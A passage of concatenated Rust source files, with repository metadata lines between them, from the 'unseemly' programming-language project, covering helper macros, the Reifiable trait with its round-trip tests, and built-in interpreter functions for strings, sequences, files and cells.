crate::alpha::freshening_enabled.with(|f| { *f.borrow_mut() = orig; }); }} } // for core_forms // Unpacking `Ast`s into environments is a pain, so here's a macro for it macro_rules! expect_node { ( ($node:expr ; $form:expr) $env:ident ; $body:expr ) => { // This is tied to the signature of `Custom` if let crate::ast::Node(ref f, ref $env, _) = $node.c() { if *f == $form { $body } else { // TODO: make it possible to specify which one panic!( "ICP or type error: Expected a {:#?} node, got {:#?}, which is {:#?}.", $form, $node, *f ) } } else { panic!( "ICP or type error: Expected a {:#?} node, got {:#?}, which isn't a node.", $form, $node ) } }; } macro_rules! expect_ty_node { ( ($node:expr ; $form:expr ; $loc:expr) $env:ident ; $body:expr ) => {{ // This is tied to the signature of `Custom` let $env = $node.ty_destructure($form, $loc)?; $body }}; } macro_rules! _get_leaf_operation { ($env:expr, =, $name:tt) => { $env.get_leaf_or_panic(&crate::name::n(stringify!($name))) }; ($env:expr, *=, $name:tt) => { $env.get_rep_leaf_or_panic(crate::name::n(stringify!($name))) }; } // Bind names based on the contents of a `Node`. // Use `=` for plain leaves, or `*=` for repeated leaves. // This uses barewords like `u!` does, but it's fine for runtime use. // TODO: use this a lot more macro_rules! node_let { ( $node:expr => {$nt:tt $form:tt } $( $n:ident $operation:tt $name:tt ),* ) => ( // Extra element is to ensure it's a tuple and not trigger `unused_params`. let ( (), $( $n ),* ) = { expect_node!( ($node ; crate::core_forms::find_core_form(stringify!($nt), stringify!($form))) env ; ((), $( _get_leaf_operation!(env, $operation, $name) ),* ) ) }; ) } // TODO: get rid of these; just use `form_pat!((alt …))` directly. macro_rules! forms_to_form_pat { ( $( $form:expr ),* ) => { form_pat!((alt $( (scope $form) ),* )) } } macro_rules! forms_to_form_pat_export { ( $( $form:expr => $export:tt),* ) => { form_pat!((alt $( (scope $form, $export) ),* )) } } // panicking destructor (when the type system should offer protection) macro_rules! extract { (($v:expr) $( $expected:path = ( $( $sub:pat ),* ) => $body:expr);* ) => { match * $v { $( $expected ( $($sub),* ) => { $body } )* _ => { icp!("{:#?} isn't a {:#?}", $v, stringify!( $($expected),* )) } } } } // Reification helper (doesn't work on parameterized types...) // TODO: just delete this, or actually add `Smuggled(std::any::Any)` to `Value`. macro_rules! cop_out_reifiability { ( $underlying_type:ty, $ty_name:tt ) => { impl Reifiable for $underlying_type { fn ty_name() -> Name { n(stringify!($ty_name)) } fn reify(&self) -> Value { Value::Smuggled(self.clone()) } fn reflect(v: &Value) -> Self { extract!((v) Value::Smuggled = (ref s) => s.downcast_ref::<Self>().expect("Smuggling has gone terribly wrong!").clone()) } } } } macro_rules! vrep { ( $( $contents:tt )*) => { vrep_accum![ ( $( $contents )* , ) ] }; } macro_rules! vrep_accum { // For ease of parsing, expects a trailing comma! (($elt:expr, $($rest:tt)*) $($accum:tt)* ) => { // ... and produces a leading comma vrep_accum!(($($rest)*) $($accum)* , crate::util::vrep::VRepElt::Single($elt)) }; (($elt:expr => ( $( $driver:expr),* ), $($rest:tt)*) $($accum:tt)* ) => { vrep_accum!(($($rest)*) $($accum)* , crate::util::vrep::VRepElt::Rep($elt, vec![ $( crate::name::n(stringify!($driver)) ),* ]) ) }; // Expect the leading comma: (() , $($accum:tt)* ) => { crate::util::vrep::VRep(vec![ $( $accum )* ]) }; } // Testing #[macro_export] macro_rules! assert_m { ($got:expr, $expected:pat => $body:stmt) => {{ let got = $got; match got.clone() { $expected => { // The `()` is actually a unit to avoid an "unnecessary trailing semicolon warning". // The `;` is to keep `cargo fmt` from removing the non-unnecessary `{}`. $body(); } _ => assert!(false, "{:#?} does not match {:#?}", got, stringify!($expected)), } }}; // Deprecated: ($got:expr, $expected:pat, $body:expr) => {{ let got = $got; match got.clone() { $expected => assert!($body), _ => assert!(false, "{:#?} does not match {:#?}", got, stringify!($expected)), } }}; ($got:expr, $expected:pat) => { assert_m!($got, $expected, true) }; } macro_rules! layer_watch { {$layer:ident : $( $body:stmt );* } => { $layer.with(|l| l.borrow_mut().0 += 1); // layers $layer.with(|l| l.borrow_mut().1 += 1); // steps let res = { $( $body )* }; $layer.with(|l| l.borrow_mut().0 -= 1); res } } // "Layer debug" macro_rules! ld { ($layer:ident, $enabled:expr, $template:tt, $($arg:expr),*) => {{ if $enabled.with(|e| *e) { let layers = $layer.with(|l| l.borrow().0) - 1; for i in 1..layers { if i % 2 == 0 { print!("║ ") } else { print!("│ "); } } if layers > 0 { if layers % 2 == 0 { print!("╠═") } else { print!("├─"); } } print!($template, $($arg),*); print!(" ({})", $layer.with(|l| l.borrow().1)); println!(); } }} } // "Layer debug, continued" macro_rules! lc { ($layer:ident, $enabled:expr, $template:tt, $($arg:expr),*) => {{ if $enabled.with(|e| *e) { let layers = $layer.with(|l| l.borrow().0) - 1; for i in 1..(layers+1) { if i % 2 == 0 { print!("║ ") } else { print!("│ "); } } println!($template, $($arg),*); } }} }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/macros/mod.rs
src/macros/mod.rs
#![macro_use] pub mod flimsy_syntax; pub mod macros; pub mod reification_macros;
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/reify.rs
src/runtime/reify.rs
// Designed for `use reify::*` pub use crate::{ast::Ast, name::*, runtime::eval::Value}; use crate::runtime::eval; use num::bigint::BigInt; use std::rc::Rc; /// This is for parts of this compiler that need to be represented as object-level values. /// Almost all of it, turns out! /// /// Since this language is extensible, we need to connect the Rust code in the compiler /// with the Unseemly code that actually gets evaluated. /// This is where the magic happens. /// /// Suppose that `T` is a two-argument generic type. /// Generally, we plan on executing code in an environment in which /// `T::<Irr,Irr>::name()` is bound to `T::<Irr,Irr>::ty()`. /// (The type arguments do not affect `name` and `ty`; `()` is convention.) /// Then, we can use `T::<SomeActualArg, OtherActualArg>::ty_invocation()` in that environment. /// /// This is also where ICPs can happen, so make sure that ::ty() is consistent with ::reify(). pub trait Reifiable { /// The Unseemly type that corresponds to to the `Reifiable` type. /// This leaves abstract the type parameters of `Self`; invoke like `Self::<Irr,Irr>::ty()`. /// e.g. `∀ A. Pair<A int>` /// TODO: rename to `generic_ty` fn ty() -> Ast { // By default, this is an opaque primitive. crate::core_type_forms::get__primitive_type(Self::ty_name()) } /// A name for that type, so that recursive types are okay. /// Ignore the type parameters of `Self`; invoke like `Self::<Irr,Irr>::ty_name()`. /// e.g. `WithInteger` fn ty_name() -> Name; /// How to refer to this type, given an environment in which /// `ty_name()` is defined to be `ty()`. /// Parameters will be concrete. /// e.g. `WithInteger<Float>` /// (Types using this type will use this, rather than `ty`) /// Don't override this. fn ty_invocation() -> Ast { let name_ref = ast!((vr Self::ty_name())); match Self::concrete_arguments() { None => name_ref, Some(args) => ast!({ "Type" "type_apply" : "type_rator" => (, name_ref), "arg" => (,seq args) }), } } // Override this to set the type arguments for invocation. fn concrete_arguments() -> Option<Vec<Ast>> { None } /// The Unseemly value that corresponds to a value. fn reify(&self) -> Value; /// Get a value from an Unseemly value fn reflect(_: &Value) -> Self; } // Core values macro_rules! basic_reifiability { ( $underlying_type:ty, $ty_name:tt, $value_name:ident ) => { impl Reifiable for $underlying_type { fn ty_name() -> Name { n($ty_name) } // TODO: can we remove these clones? are they even bad? // They seem redundant in the `Name` case, at least fn reify(&self) -> Value { Value::$value_name(self.clone()) } fn reflect(v: &Value) -> Self { extract!((v) Value::$value_name = (ref i) => i.clone()) } } } } /// Irr: the irrelevant type (like `!`). Satisfies a bunch of traits; can't be created. #[derive(Copy, Clone, PartialEq, Eq, Debug, Hash)] pub enum Irr {} // No values can be created. impl std::fmt::Display for Irr { fn fmt(&self, _: &mut std::fmt::Formatter) -> std::fmt::Result { icp!() } } impl Default for Irr { fn default() -> Irr { icp!() } } impl Reifiable for Irr { fn ty_name() -> Name { icp!() } fn reify(&self) -> Value { icp!() } fn reflect(_: &Value) -> Self { icp!() } } impl crate::walk_mode::WalkElt for Irr { fn from_ast(_: &Ast) -> Self { icp!() } fn to_ast(&self) -> Ast { icp!() } } impl crate::walk_mode::WalkMode for Irr { fn name() -> &'static str { icp!() } type Elt = Irr; type Negated = NegIrr; type AsPositive = Irr; type AsNegative = NegIrr; type Err = Irr; type D = crate::walk_mode::Positive<Irr>; type ExtraInfo = Irr; fn get_walk_rule(_: &crate::form::Form) -> crate::ast_walk::WalkRule<Irr> { icp!() } fn automatically_extend_env() -> bool { icp!() } fn underspecified(_: Name) -> Irr { icp!() } } #[derive(Copy, Clone, PartialEq, Eq, Debug, Hash)] pub enum NegIrr {} impl Reifiable for NegIrr { fn ty_name() -> Name { icp!() } fn reify(&self) -> Value { icp!() } fn reflect(_: &Value) -> Self { icp!() } } impl crate::walk_mode::WalkMode for NegIrr { fn name() -> &'static str { icp!() } type Elt = Irr; type Negated = Irr; type AsPositive = Irr; type AsNegative = NegIrr; type Err = Irr; type D = crate::walk_mode::Negative<NegIrr>; type ExtraInfo = Irr; fn get_walk_rule(_: &crate::form::Form) -> crate::ast_walk::WalkRule<NegIrr> { icp!() } fn automatically_extend_env() -> bool { icp!() } fn underspecified(_: Name) -> Irr { icp!() } } impl crate::walk_mode::NegativeWalkMode for NegIrr { fn needs_pre_match() -> bool { panic!() } } basic_reifiability!(BigInt, "Int", Int); impl Reifiable for bool { fn ty_name() -> Name { n("Bool") } fn reify(&self) -> Value { eval::Value::Enum(n(if *self { "True" } else { "False" }), vec![]) } fn reflect(v: &Value) -> Self { extract!((v) Value::Enum = (ref name, _) => name == &n("True")) } } // note: operations for these shouldn't have BigInt semantics! impl Reifiable for usize { fn ty_name() -> Name { n("Rust_usize") } fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) } fn reflect(v: &Value) -> Self { use num::ToPrimitive; extract!((v) Value::Int = (ref i) => i.to_usize().unwrap()) } } impl Reifiable for i32 { fn ty_name() -> Name { n("Rust_i32") } fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) } fn reflect(v: &Value) -> Self { use num::ToPrimitive; extract!((v) Value::Int = (ref i) => i.to_i32().unwrap()) } } impl Reifiable for u8 { fn ty_name() -> Name { n("Rust_u8") } fn reify(&self) -> Value { Value::Int(BigInt::from(*self)) } fn reflect(v: &Value) -> Self { use num::ToPrimitive; extract!((v) Value::Int = (ref i) => i.to_u8().unwrap()) } } impl Reifiable for () { fn ty_name() -> Name { n("Unit") } fn reify(&self) -> Value { Value::Int(BigInt::from(0)) } fn reflect(_: &Value) -> Self {} } impl<T0: Reifiable, T1: Reifiable> Reifiable for (T0, T1) { fn ty_name() -> Name { n("Tuple2") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T0::ty_invocation(), T1::ty_invocation()]) } fn reify(&self) -> Value { Value::Sequence(vec![Rc::new(self.0.reify()), Rc::new(self.1.reify())]) } fn reflect(v: &Value) -> Self { extract!((v) Value::Sequence = (ref s) => (T0::reflect(&*s[0]), T1::reflect(&*s[1]))) } } impl Reifiable for String { fn ty_name() -> Name { n("Rust_str") } fn reify(&self) -> Value { val!(ast (at self)) } fn reflect(v: &Value) -> Self { match v { eval::AbstractSyntax(at_ast) => at_ast.to_name().orig_sp(), _ => icp!(), } } } // This is right, right? impl Reifiable for Value { fn ty_name() -> Name { n("any") } fn reify(&self) -> Value { self.clone() } fn reflect(v: &Value) -> Self { v.clone() } } // TODO: when returning traits works, just make functions `Reifiable` // TOUNDERSTAND: 'x also allows things to be owned instead?!? pub fn reify_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>( f: Rc<Box<(dyn Fn(A) -> R)>>, ) -> Value { Value::BuiltInFunction(eval::BIF(Rc::new(move |args: Vec<Value>| { ((*f)(A::reflect(&args[0]))).reify() }))) } pub fn reflect_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>( f_v: Value, ) -> Rc<Box<(dyn Fn(A) -> R)>> { Rc::new(Box::new(move |a: A| { extract!((&f_v) Value::BuiltInFunction = (ref bif) => R::reflect(&(*bif.0)(vec![a.reify()])); Value::Function = (ref closure) => { R::reflect(&eval::eval(&closure.body, closure.env.clone().set(closure.params[0], a.reify())).unwrap()) }) })) } // I bet there's more of a need for reification than reflection for functions.... pub fn reify_2ary_function< A: Reifiable + 'static, B: Reifiable + 'static, R: Reifiable + 'static, >( f: Rc<Box<(dyn Fn(A, B) -> R)>>, ) -> Value { Value::BuiltInFunction(eval::BIF(Rc::new(move |args: Vec<Value>| { ((*f)(A::reflect(&args[0]), B::reflect(&args[1]))).reify() }))) } pub fn reflect_2ary_function< A: Reifiable + 'static, B: Reifiable + 'static, R: Reifiable + 'static, >( f_v: Value, ) -> Rc<Box<(dyn Fn(A, B) -> R)>> { Rc::new(Box::new(move |a: A, b: B| { extract!((&f_v) Value::BuiltInFunction = (ref bif) => R::reflect(&(*bif.0)(vec![a.reify(), b.reify()])); Value::Function = (ref closure) => { R::reflect(&eval::eval(&closure.body, closure.env.clone().set(closure.params[0], a.reify()) .set(closure.params[1], b.reify())).unwrap()) }) })) } pub fn ty_of_1ary_function<A: Reifiable + 'static, R: Reifiable + 'static>() -> Ast { ast!("TODO: generate type") } macro_rules! reify_types { ( $($t:ty),* ) => {{ let mut res = Assoc::new(); $( res = res.set(<$t as Reifiable>::ty_name(), <$t as Reifiable>::ty()); )* res }} } macro_rules! fake_reifiability { ( $underlying_type:ty ) => { impl Reifiable for $underlying_type { fn ty_name() -> Name { n(stringify!($underlying_type)) } fn reify(&self) -> Value { panic!() } fn reflect(_: &Value) -> Self { panic!() } } }; } // impl<A: Reifiable, R: Reifiable> Reifiable for Box<Fn(A) -> R> { // fn ty() -> Ast { panic!("") } // // fn reify(&self) -> Value { panic!("") } // // fn reflect(v: &Value) -> Self { panic!("") } // } // We can't add derive() to existing types, but we can `impl` these ourselves directly // This feels a little awkward, just dropping the `Rc`ness on the floor. // But I think `Value` has enouch `Rc` inside that nothing can go wrong... right? impl<T: Reifiable> Reifiable for Rc<T> { fn ty() -> Ast { T::ty() } fn ty_name() -> Name { T::ty_name() } fn concrete_arguments() -> Option<Vec<Ast>> { T::concrete_arguments() } fn reify(&self) -> Value { (**self).reify() } fn reflect(v: &Value) -> Self { Rc::new(T::reflect(v)) } } /// Takes the Unseemly type `T` to `Sequence<T>` pub fn sequence_type__of(ty: &Ast) -> Ast { ast!({ "Type" "type_apply" : "type_rator" => (, crate::core_type_forms::get__primitive_type(n("Sequence"))), "arg" => [(, ty.clone()) ]}) } /// Takes the Unseemly type `Sequence<T>` to `T` pub fn un__sequence_type(ty: &Ast, loc: &Ast) -> Result<Ast, crate::ty::TypeError> { // This is a hack; `Sequence` is not a nonterminal! crate::core_type_forms::less_quoted_ty(ty, Some(n("Sequence")), loc) } impl<T: Reifiable> Reifiable for Vec<T> { fn ty_name() -> Name { n("Sequence") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> Value { Value::Sequence(self.iter().map(|elt| Rc::new(elt.reify())).collect()) } fn reflect(v: &Value) -> Self { extract!((v) Value::Sequence = (ref s) => s.iter().map(|elt| T::reflect(&elt)).collect() ) } } impl<T: Reifiable> Reifiable for std::boxed::Box<T> { fn ty() -> Ast { T::ty() } fn ty_name() -> Name { T::ty_name() } fn concrete_arguments() -> Option<Vec<Ast>> { T::concrete_arguments() } fn reify(&self) -> Value { (**self).reify() } fn reflect(v: &Value) -> Self { std::boxed::Box::new(T::reflect(v)) } } // The roundtrip will de-alias the cell, sadly. impl<T: Reifiable> Reifiable for std::cell::RefCell<T> { fn ty_name() -> Name { n("Rust_RefCell") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> Value { self.borrow().reify() } fn reflect(v: &Value) -> Self { std::cell::RefCell::<T>::new(T::reflect(v)) } } impl<T: Reifiable> Reifiable for std::marker::PhantomData<T> { fn ty_name() -> Name { n("PhantomData") } fn concrete_arguments() -> Option<Vec<Ast>> { Some(vec![T::ty_invocation()]) } fn reify(&self) -> Value { Value::Int(BigInt::from(0)) } fn reflect(_: &Value) -> Self { std::marker::PhantomData } } // Hey, I know how to generate the implementation for this... Reifiable! { () pub enum Option<T> { None, Some(T) } } Reifiable! { () pub enum Result<T, E> { Ok(T), Err(E), } } // for testing custom_derive! { #[derive(Debug, PartialEq, Eq, Reifiable, Clone)] struct BasicStruct { pub a: BigInt, // TODO: change to String to test heterogeneity b: BigInt } } custom_derive! { #[derive(Debug, PartialEq, Eq, Reifiable, Clone)] struct NestedStruct { x: BasicStruct } } #[derive(Debug, PartialEq, Eq, Clone)] struct OldName<'t> { actual: Name, pd: std::marker::PhantomData<&'t u32>, } fn new_oldname<'t>(nm: Name) -> OldName<'t> { OldName { actual: nm, pd: std::marker::PhantomData } } impl<'t> Reifiable for OldName<'t> { fn ty_name() -> Name { n("OldName") } fn reify(&self) -> Value { self.actual.reify() } fn reflect(v: &Value) -> Self { new_oldname(Name::reflect(v)) } } custom_derive! { #[derive(Debug, PartialEq, Eq, Reifiable(lifetime), Clone)] enum BasicLifetimeEnum<'t> { Only(OldName<'t>) } } custom_derive! { #[derive(Debug, PartialEq, Eq, Reifiable, Clone)] enum BasicEnum { Jefferson(BigInt, BigInt), // TODO: change the first one to String Burr(BigInt) } } custom_derive! { #[derive(Debug, PartialEq, Eq, Reifiable(lifetime), Clone)] struct ParameterizedLifetimeStruct<'t, T, S> { pub a: T, b: S, c: OldName<'t> } } // TODO: just write a macro that does a really faky custom_derive by calling `Reifiable!` // around something and then putting down its definition. #[test] fn basic_reification() { assert_eq!(BigInt::from(1800).reify(), val!(i 1800)); } #[test] fn basic_reflection() { assert_eq!(BigInt::reflect(&val!(i 1800)), BigInt::from(1800)); } #[test] fn basic_r_and_r_roundtrip() { assert_eq!(BigInt::from(90), BigInt::reflect(&BigInt::from(90).reify())); let bsv = BasicStruct { a: BigInt::from(4), b: BigInt::from(5) }; assert_eq!(bsv, BasicStruct::reflect(&bsv.reify())); let nsv = NestedStruct { x: bsv }; assert_eq!(nsv, NestedStruct::reflect(&nsv.reify())); let bev0 = BasicEnum::Jefferson(BigInt::from(17), BigInt::from(1781)); let bev1 = BasicEnum::Burr(BigInt::from(1781)); assert_eq!(bev0, BasicEnum::reflect(&bev0.reify())); assert_eq!(bev1, BasicEnum::reflect(&bev1.reify())); // assert_eq!(None, Option::reflect(&None.reify())); assert_eq!(Some(BigInt::from(5)), Option::reflect(&Some(BigInt::from(5)).reify())); assert_eq!(Some(bev1.clone()), Option::reflect(&Some(bev1.clone()).reify())); assert_eq!(Rc::new(bev0.clone()), Rc::reflect(&Rc::new(bev0.clone()).reify())); assert_eq!( std::boxed::Box::new(bev0.clone()), std::boxed::Box::reflect(&std::boxed::Box::new(bev0.clone()).reify()) ); let bleo = BasicLifetimeEnum::Only(new_oldname(n("AlexanderHamilton"))); assert_eq!(bleo, BasicLifetimeEnum::reflect(&bleo.reify())); let pls = ParameterizedLifetimeStruct::<BigInt, bool> { a: BigInt::from(10), b: false, c: new_oldname(n("DuelCommandments")), }; assert_eq!(pls, ParameterizedLifetimeStruct::<BigInt, bool>::reflect(&pls.reify())); } #[test] fn function_r_and_r_roundtrip() { let f = |a: BigInt| a + BigInt::from(1); let f2 = reflect_1ary_function::<BigInt, BigInt>(reify_1ary_function(Rc::new(Box::new(f)))); assert_eq!((*f2)(BigInt::from(1776)), BigInt::from(1777)); } struct T {} fake_reifiability!(T); struct S {} fake_reifiability!(S); #[test] fn reified_types() { //"ParameterizedLifetimeStruct<Option<Rust_usize> integer>" assert_eq!( ParameterizedLifetimeStruct::<'static, Option<usize>, BigInt>::ty_invocation(), ast!({"Type" "type_apply" : "type_rator" => (vr "ParameterizedLifetimeStruct"), "arg" => [ {"Type" "type_apply" : "type_rator" => (vr "Option"), "arg" => [ (vr "Rust_usize") ] }, (vr "Int")] }) ); assert_eq!( ParameterizedLifetimeStruct::<'static, T, S>::ty(), ast!({"Type" "forall_type" : "param" => ["T", "S"], "body" => (import [* [forall "param"]] {"Type" "mu_type" : "param" => [(import [prot "param"] (vr "ParameterizedLifetimeStruct"))], "body" => (import [* [prot "param"]] {"Type" "struct" : // TODO: why did the order of fields get reversed? "component_name" => [@"c" "c", "b", "a"], "component" => [@"c" (vr "OldName"), (vr "S"), (vr "T")] }) }) }) ) }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/runtime/core_values.rs
src/runtime/core_values.rs
use crate::{ ast::Ast, core_type_forms::get__primitive_type, name::*, runtime::eval::{ apply__function_value, eval, Value::{self, *}, BIF, }, util::assoc::Assoc, }; use std::rc::Rc; use num::{BigInt, ToPrimitive}; #[derive(Debug, Clone, PartialEq)] pub struct TypedValue { pub ty: Ast, pub val: Value, } pub fn erase_type(tv: &TypedValue) -> Value { tv.val.clone() } pub fn erase_value(tv: &TypedValue) -> Ast { tv.ty.clone() } pub fn string_operations() -> Assoc<Name, TypedValue> { assoc_n!( "string_to_sequence" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [{"Type" "Int" :}]} }, (Text(s)) => Sequence(s.chars().map(|c: char| Rc::new(Int(BigInt::from(c as u32)))).collect()) }, "anything_to_string" => tyf!{ { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [(vr "T")], "ret" => {"Type" "String" :}})}, (anything) => Text(format!("{}", anything)) }, "ident_to_string" => tyf! { {"Type" "fn" : "param" => [{"Type" "Ident" :}], "ret" => {"Type" "String" :} }, (AbstractSyntax(ast_for_atom)) => Text(ast_for_atom.to_name().orig_sp())}, "concat" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}], "ret" => {"Type" "String" :} }, (Text(lhs), Text(rhs)) => Text(format!("{}{}", lhs, rhs))}, "replace" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}, {"Type" "String" :}], "ret" => {"Type" "String" :} }, (Text(body), Text(old), Text(new)) => Text(body.replace(&old, &new))}, "contains?" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}], "ret" => (vr "Bool") }, (Text(lhs), Text(rhs)) => val!(b lhs.contains(&rhs))}, "join" => tyf! { {"Type" "fn" : "param" => [{"Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [{"Type" "String" :}]}, {"Type" "String" :}], "ret" => {"Type" "String" :} }, (Sequence(seq), Text(joiner)) => { let mut buf = String::new(); let mut first = true; for elt in seq { if !first { buf.push_str(&joiner); } first = false; if let Text(ref str_elt) = *elt { buf.push_str(str_elt); } } Text(buf) }}, "read_file" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => {"Type" "String" :} }, (Text(filename)) => { let mut contents = String::new(); use std::io::Read; std::fs::File::open(std::path::Path::new(&filename)) .expect("Error opening file") .read_to_string(&mut contents) .expect("Error reading file"); Text(contents) }}, "write_file" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}, {"Type" "String" :}], "ret" => (vr "Unit") }, (Text(filename), Text(contents)) => { std::fs::write(filename, contents).expect("Error writing file"); Sequence(vec![]) }}, "os_command" => tyf! { {"Type" "fn" : "param" => [ {"Type" "String" :}, {"Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [{"Type" "String" :}] }], "ret" => {"Type" "String" :} }, (Text(command_name), Sequence(args)) => { Text(std::str::from_utf8(&std::process::Command::new(&command_name) .args(args.iter().map(|arg| match &**arg { Text(str_arg) => str_arg, _ => icp!()})) .output() .expect("process failure") .stdout).unwrap().to_string()) } }, "print" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => (vr "Unit") }, (Text(contents)) => { print!("{}", contents); Sequence(vec![]) }}, "env_var" => tyf! { {"Type" "fn" : "param" => [{"Type" "String" :}], "ret" => {"Type" "type_apply" : "type_rator" => (vr "Option"), "arg" => [{"Type" "String" :}]}}, (Text(env_var)) => { match std::env::var(&env_var) { Ok(contents) => val!(enum "Some", (s contents)), Err(_) => val!(enum "None", ) } } }, "language__highlight_rules" => tyf! { {"Type" "forall_type" : "param" => ["T", "S"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [{"Type" "tuple" : "component" => [ (, get__primitive_type(n("LanguageSyntax"))), (vr "T"), (vr "S") ] }], "ret" => {"Type" "String" :}})}, (Sequence(tuple)) => { extract!((tuple[0]) ParseContext = (ref lang) => { Text(crate::highlighter_generation::ace_rules(&lang.grammar)) }) } } ) } pub fn sequence_operations() -> Assoc<Name, TypedValue> { assoc_n!( "range" => tyf!( {"Type" "fn" : "param" => [{"Type" "Int" :}, {"Type" "Int" :}], "ret" => {"Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [{"Type" "Int" :}]}}, (Int(start), Int(end)) => Sequence((start.to_i32().unwrap()..end.to_i32().unwrap()).map( |i| Rc::new(Int(BigInt::from(i)))).collect()) ), "empty" => TypedValue { ty: ast!({"Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]})}), val: val!(seq)}, "index" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]}, { "Type" "Int" : } ], "ret" => (vr "T")})}, ( Sequence(seq), Int(idx)) => (*seq[idx.to_usize().unwrap()]).clone()), "len" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]} ], "ret" => { "Type" "Int" : }})}, ( Sequence(seq) ) => val!(i seq.len())), "push" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]}, (vr "T") ], "ret" => { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]}})}, ( Sequence(seq), elt) => { let mut result = seq.clone(); result.push(Rc::new(elt)); Sequence(result)}), "map" => tyf!( { "Type" "forall_type" : "param" => ["T", "U"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]}, { "Type" "fn" : "param" => [(vr "T")], "ret" => (vr "U") } ], "ret" => { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "U")]} })}, ( Sequence(seq), f) => { Sequence(seq.into_iter().map( |elt| Rc::new(apply__function_value(&f, vec![(*elt).clone()]))).collect()) }), "foldl" => tyf!( { "Type" "forall_type" : "param" => ["T", "U"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Sequence"), "arg" => [(vr "T")]}, (vr "U"), { "Type" "fn" : "param" => [(vr "U"), (vr "T")], "ret" => (vr "U") } ], "ret" => (vr "U") })}, ( Sequence(seq), init, f) => { seq.into_iter().fold(init, |running, elt| { apply__function_value(&f, vec![running, (*elt).clone()]) }) }) ) } pub fn cell_operations() -> Assoc<Name, TypedValue> { assoc_n!( "new_cell" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [(vr "T")], "ret" => { "Type" "type_apply" : "type_rator" => (vr "Cell"), "arg" => [(vr "T")]}})}, ( val ) => { Cell(Rc::new(std::cell::RefCell::new(val))) } ), "assign" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Cell"), "arg" => [(vr "T")]}, (vr "T") ], "ret" => (vr "Unit")})}, ( Cell(cell), val ) => { cell.replace(val); Sequence(vec![]) } ), "value" => tyf!( { "Type" "forall_type" : "param" => ["T"], "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "type_apply" : "type_rator" => (vr "Cell"), "arg" => [(vr "T")]} ], "ret" => (vr "T")})}, ( Cell(cell) ) => { (*cell.borrow()).clone() } ) ) } thread_local! { pub static static_core_values: Assoc<Name, TypedValue> = make_core_typed_values(); } pub fn core_typed_values() -> Assoc<Name, TypedValue> { static_core_values.with(|cv| cv.clone()) } fn make_core_typed_values() -> Assoc<Name, TypedValue> { assoc_n!( "fix" => tyf!( { "Type" "forall_type" : "param" => ["F"], // has to be a function, but we don't know its arity "body" => (import [* [forall "param"]] { "Type" "fn" : "param" => [ { "Type" "fn" : "param" => [{"Type" "fn" : "param" => [], "ret" => (vr "F") }], "ret" => (vr "F")} ], "ret" => (vr "F") })}, // TODO: built-in functions, even though none of them make sense here, shouldn't crash ( Function(cl) ) => { let new_env = cl.env.set(cl.params[0], // reconstruct the invocation that caused this: Function(Rc::new(crate::runtime::eval::Closure { body: ast!({"Expr" "apply" : "rator" => (vr "fix"), "rand" => [(vr "orig_arg")]}), params: vec![], env: assoc_n!("orig_arg" => Function(cl.clone()), // TODO: `core_values` does the `map` every time... "fix" => core_values().find_or_panic(&n("fix")).clone())}))); eval(&cl.body, new_env).unwrap() // TODO: should be able to return `Result` } ), // From a value, produces an expression that evalutes to it. // Not 